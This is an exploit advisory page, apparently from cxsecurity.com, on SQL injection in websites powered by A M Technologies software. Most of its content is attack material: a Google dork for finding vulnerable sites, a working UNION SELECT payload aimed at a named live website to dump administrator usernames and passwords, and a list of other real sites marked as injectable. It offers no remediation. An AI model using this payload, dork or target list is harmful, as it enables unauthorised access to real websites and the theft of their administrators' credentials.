A M Technologies SQL injection Vulnerability

2017.08.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################### # Exploit Title: A M Technologies SQL injection Vulnerability # Google Dork :intext:"Powered by A M Technologies" inurl:php?id= # https://www.youtube.com/channel/UCyngNTHNoRLQkWRn3bQjpJQ # Discovered By: Mr.voltage && mtn08 # Vendor Homepage : http://www.amtechnologies.in/ ########################## # {DEMO} http://www.multitechengineers.in/content.php?id=-16'+UNION SELECT 1,2,3,group_concat(adminUsername,0x3a,adminPassword),5,6,7,8,9,10,11 from adminmaster--+ http://www.ravipaverblock.com/content.php?id=2%27 http://www.dishapro.com/content.php?id=3%27 http://www.weltechweighingsystems.net/content.php?id=18%27 ################################### #Thanks to : Shayan 72 # Discovered By: Mr.voltage && mtn08 # skype: mr.voltage@yahoo.com && live:mattin.attacker

References:

https://www.youtube.com/channel/UCyngNTHNoRLQkWRn3bQjpJQ


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top